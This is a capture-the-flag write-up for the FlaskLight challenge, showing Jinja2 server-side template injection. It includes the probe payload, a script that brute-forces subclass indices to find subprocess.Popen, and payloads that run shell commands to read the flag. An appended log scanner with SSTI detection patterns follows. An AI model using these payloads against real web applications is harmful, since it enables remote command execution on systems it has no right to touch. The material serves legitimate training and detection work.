[CSCCTF 2019 Qual]FlaskLight

Open the challenge environment.

The page source shows that a parameter can be passed via GET.

A quick test confirms that the parameter is vulnerable to SSTI (server-side template injection).

{{''.__class__.__mro__[2].__subclasses__()}}
# dumps every class reachable from the string type's base object

Write a script to find a usable class in that list.

The target is subprocess.Popen, which can run commands.

import requests
import re
import html
import time

# Request one subclass index at a time; the page echoes the rendered template
# inside <h3>...</h3>, so the class repr can be read back from the response.
index = 0
for i in range(170, 1000):
    try:
        url = "http://d508a2e1-0194-4d51-871a-42388d21b1a5.node5.buuoj.cn:81/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall(r"<h2>You searched for:</h2>\W+<h3>(.*)</h3>", r.text)
        time.sleep(0.1)
        # print(res)
        # print(r.text)
        res = html.unescape(res[0])  # the class repr is HTML-escaped in the page
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except Exception:
        # no <h3> match (or a request error): skip this index
        continue
print("index of subprocess.Popen: " + str(index))

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}

?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
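Seen from the server side, everything above arrives in a single `search` query parameter: first a bare `{{...}}` probe, then the `__class__.__mro__[2].__subclasses__()` walk that dumps the class list, and finally a call by list position in which the name `subprocess.Popen` never appears on the wire. The following is an added example from the defender's side, not code from the original writeup: a stdlib-only scanner over constructed access-log lines that decodes each query-string value and grades it as a probe, a class walk, or a command-execution attempt. The log lines, the `search` parameter name and the severity labels are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Names that appear when a template expression walks from a literal to
# arbitrary classes, and names that indicate a command is being run.
WALK_NAMES = ("__class__", "__mro__", "__subclasses__", "__globals__", "__builtins__")
EXEC_NAMES = ("subprocess", "Popen", "os.system", "os.popen", "__import__", "shell=True")
TEMPLATE_DELIM = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Calling a class by its position in __subclasses__() never names the class,
# so it needs its own pattern rather than a keyword match.
CALL_BY_INDEX = re.compile(r"__subclasses__\s*\(\s*\)\s*\[\s*\d+\s*\]\s*\(")
# Combined-log-format line; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)'
)

# Constructed sample log lines (not from the original post). The first
# request is benign; the next three follow the stages shown in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2024:15:35:01 +0000] "GET /?search=hello HTTP/1.1" 200 512
10.0.0.7 - - [03/May/2024:15:35:04 +0000] "GET /?search=%7B%7B7*7%7D%7D HTTP/1.1" 200 512
10.0.0.7 - - [03/May/2024:15:35:09 +0000] "GET /?search=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%7D%7D HTTP/1.1" 200 8192
10.0.0.7 - - [03/May/2024:15:35:15 +0000] "GET /?search=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%5B258%5D%28%27ls%27%2Cshell%3DTrue%2Cstdout%3D-1%29.communicate%28%29%5B0%5D%7D%7D HTTP/1.1" 200 300
"""


def decode_value(raw):
    """Undo one extra layer of URL encoding (parse_qs already removed the first)."""
    return unquote_plus(raw)


def classify_value(value):
    """Grade one decoded parameter value; returns severity and matched indicators."""
    has_template = bool(TEMPLATE_DELIM.search(value))
    walk_hits = [n for n in WALK_NAMES if n in value]
    exec_hits = [n for n in EXEC_NAMES if n in value]
    if exec_hits or CALL_BY_INDEX.search(value):
        severity = "command_exec"
    elif walk_hits:
        severity = "class_walk"
    elif has_template:
        severity = "probe"
    else:
        severity = "none"
    return {"severity": severity, "template_syntax": has_template,
            "indicators": walk_hits + exec_hits}


def scan_log(text):
    """Return one finding per suspicious query-string value in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                value = decode_value(raw)
                info = classify_value(value)
                if info["severity"] == "none":
                    continue
                findings.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                                 "value": value, **info})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['severity']:13} {f['param']}={f['value'][:60]}")
```

The `CALL_BY_INDEX` pattern is the part worth keeping: a keyword list alone would grade the final request as just another class walk, because the only thing identifying Popen is the number 258. The fix on the application side is the usual one for Jinja2: pass the search string to the template as a context variable instead of building the template source from it.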

Posted on 2024-05-03 15:35 by 跳河离去的鱼